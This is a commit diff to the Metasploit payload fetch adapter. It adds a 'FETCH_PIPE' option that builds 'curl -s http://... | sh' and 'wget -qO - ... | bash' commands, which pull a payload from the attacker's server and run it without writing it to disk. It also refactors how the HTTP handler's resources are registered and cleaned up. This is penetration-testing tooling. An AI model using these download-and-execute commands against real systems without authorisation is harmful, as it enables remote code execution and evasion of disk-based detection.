Rebase and add support for piped fetch commands

Author: bwatters-r7

lib/msf/core/payload/adapter/fetch.rb

@@ -17,10 +17,11 @@ def initialize(*args)
         Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
       ]
     )
-    @delete_resource = true
     @fetch_service = nil
     @myresources = []
     @srvexe = ''
+    @pipe_uri = nil
+    @pipe_cmd = nil
     @remote_destination_win = nil
     @remote_destination_nix = nil
     @windows = nil
@@ -65,6 +66,10 @@ def download_uri
     "#{srvnetloc}/#{srvuri}"
   end
 
+  def _download_pipe
+    "#{srvnetloc}/#{@pipe_uri}"
+  end
+
   def fetch_bindhost
     datastore['FetchListenerBindAddress'].blank? ? srvhost : datastore['FetchListenerBindAddress']
   end
@@ -81,11 +86,36 @@ def generate(opts = {})
     opts[:arch] ||= module_info['AdaptedArch']
     opts[:code] = super
     @srvexe = generate_payload_exe(opts)
-    cmd = generate_fetch_commands
+    if datastore['FETCH_PIPE']
+      @pipe_cmd = '(' + generate_fetch_commands + ')'
+      vprint_status(@pipe_cmd)
+      cmd = generate_pipe_command
+      if datastore['FETCH_FILELESS']
+        cmd << 'bash'
+      else
+        cmd << 'sh'
+      end    else
+      cmd = generate_fetch_commands
+    end
     vprint_status("Command to run on remote host: #{cmd}")
     cmd
   end
 
+  def generate_pipe_command
+    # TODO: Make a check method that determines if we support a platform/server/command combination
+    #
+    @pipe_uri = srvuri + 'p'
+    case datastore['FETCH_COMMAND'].upcase
+    when 'WGET'
+      return _generate_wget_pipe
+    when 'CURL'
+      return _generate_curl_pipe
+    else
+      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+    end
+  end
+
+
   def generate_fetch_commands
     # TODO: Make a check method that determines if we support a platform/server/command combination
     #
@@ -232,9 +262,8 @@ def _generate_certutil_command
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end
-    _execute_add(get_file_cmd)
+    cmd + _execute_add(get_file_cmd)
   end
-  
 
   # The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains "memfd") with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor
   def _generate_fileless(get_file_cmd)
@@ -281,6 +310,19 @@ def _generate_curl_command
     _execute_add(get_file_cmd)
   end
 
+  def _generate_curl_pipe
+    case fetch_protocol
+    when 'HTTP'
+      pipe_cmd = "curl -s http://#{_download_pipe} | "
+    when 'HTTPS'
+      pipe_cmd = "curl -sk https://#{_download_pipe} | "
+    when 'TFTP'
+      pipe_cmd = "curl -s tftp://#{_download_pipe} | "
+    else
+      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+    end
+  end
+
   def _generate_ftp_command
     case fetch_protocol
     when 'FTP'
@@ -342,6 +384,17 @@ def _generate_wget_command
     _execute_add(get_file_cmd)
   end
 
+  def _generate_wget_pipe
+    case fetch_protocol
+    when 'HTTPS'
+      return "wget --no-check-certificate -qO - https://#{_download_pipe} | "
+    when 'HTTP'
+      return "wget -qO - http://#{_download_pipe} | "
+    else
+      return nil
+    end
+  end
+
   def _remote_destination
     return _remote_destination_win if windows?
 
@@ -353,15 +406,15 @@ def _remote_destination_nix
 
     if datastore['FETCH_FILELESS'] != 'none'
       @remote_destination_nix = '$f'
-      return @remote_destination_nix
+    else
+      writable_dir = datastore['FETCH_WRITABLE_DIR']
+      writable_dir = '.' if writable_dir.blank?
+      writable_dir += '/' unless writable_dir[-1] == '/'
+      payload_filename = datastore['FETCH_FILENAME']
+      payload_filename = srvuri if payload_filename.blank?
+      payload_path = writable_dir + payload_filename
+      @remote_destination_nix = payload_path
     end
-    writable_dir = datastore['FETCH_WRITABLE_DIR']
-    writable_dir = '.' if writable_dir.blank?
-    writable_dir += '/' unless writable_dir[-1] == '/'
-    payload_filename = datastore['FETCH_FILENAME']
-    payload_filename = srvuri if payload_filename.blank?
-    payload_path = writable_dir + payload_filename
-    @remote_destination_nix = payload_path
     @remote_destination_nix
   end
 

lib/msf/core/payload/adapter/fetch/http.rb

@@ -11,16 +11,23 @@ def initialize(*args)
 
   def cleanup_handler
     if @fetch_service
-      cleanup_http_fetch_service(@fetch_service, @delete_resource)
+      cleanup_http_fetch_service(@fetch_service, @myresources)
       @fetch_service = nil
     end
 
     super
   end
 
   def setup_handler
-    @fetch_service = start_http_fetch_handler(srvname, @srvexe) unless datastore['FetchHandlerDisable']
+    unless datastore['FetchHandlerDisable']
+      @fetch_service = start_http_fetch_handler(srvname) unless datastore['FetchHandlerDisable']
+      escaped_uri = ('/' + srvuri).gsub('//', '/')
+      add_resource(@fetch_service, escaped_uri, @srvexe)
+      unless @pipe_uri.nil?
+        uri = ('/' + @pipe_uri).gsub('//', '/')
+        add_resource(@fetch_service, uri, @pipe_cmd)
+      end
+    end
     super
   end
-
 end

lib/msf/core/payload/adapter/fetch/linux_options.rb

@@ -6,7 +6,8 @@ def initialize(info = {})
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
         Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
-        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]
     )
   end

lib/msf/core/payload/adapter/fetch/server/http.rb

@@ -21,42 +21,44 @@ def srvname
 
   def add_resource(fetch_service, uri, srvexe)
     vprint_status("Adding resource #{uri}")
-    if fetch_service.resources.include?(uri)
+    begin
+      if fetch_service.resources.include?(uri)
+        # When we clean up, we need to leave resources alone, because we never added one.
+        fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected. Set FETCH_URIPATH to a different value to continue.")
+      end
+      fetch_service.add_resource(uri,
+                                 'Proc' => proc do |cli, req|
+                                   on_request_uri(cli, req, srvexe)
+                                 end,
+                                 'VirtualDirectory' => true)
+    rescue  ::Exception => e
       # When we clean up, we need to leave resources alone, because we never added one.
-      @delete_resource = false
-      fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected. Set FETCH_URIPATH to a different value to continue.")
+      fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n#{e}")
     end
-    fetch_service.add_resource(uri,
-                               'Proc' => proc do |cli, req|
-                                 on_request_uri(cli, req, srvexe)
-                               end,
-                               'VirtualDirectory' => true)
-  rescue  ::Exception => e
-    # When we clean up, we need to leave resources alone, because we never added one.
-    @delete_resource = false
-    fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n#{e}")
+    @myresources << uri
   end
 
-  def cleanup_http_fetch_service(fetch_service, delete_resource)
-    escaped_srvuri = ('/' + srvuri).gsub('//', '/')
-    if fetch_service.resources.include?(escaped_srvuri) && delete_resource
-      fetch_service.remove_resource(escaped_srvuri)
+  def cleanup_http_fetch_service(fetch_service, my_resources)
+    my_resources.each do |uri|
+      if fetch_service.resources.include?(uri)
+        fetch_service.remove_resource(uri)
+      end
+
     end
+
     fetch_service.deref
   end
 
-  def start_http_fetch_handler(srvname, srvexe, ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
+  def start_http_fetch_handler(srvname, ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
     # this looks a bit funny because I converted it to use an instance variable so that if we crash in the
     # middle and don't return a value, we still have the right fetch_service to clean up.
-    escaped_srvuri = ('/' + srvuri).gsub('//', '/')
     fetch_service = start_http_server(ssl, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
     if fetch_service.nil?
       cleanup_handler
       fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{fetch_bindnetloc}")
     end
     vprint_status("#{fetch_protocol} server started")
     fetch_service.server_name = srvname
-    add_resource(fetch_service, escaped_srvuri, srvexe)
     fetch_service
   end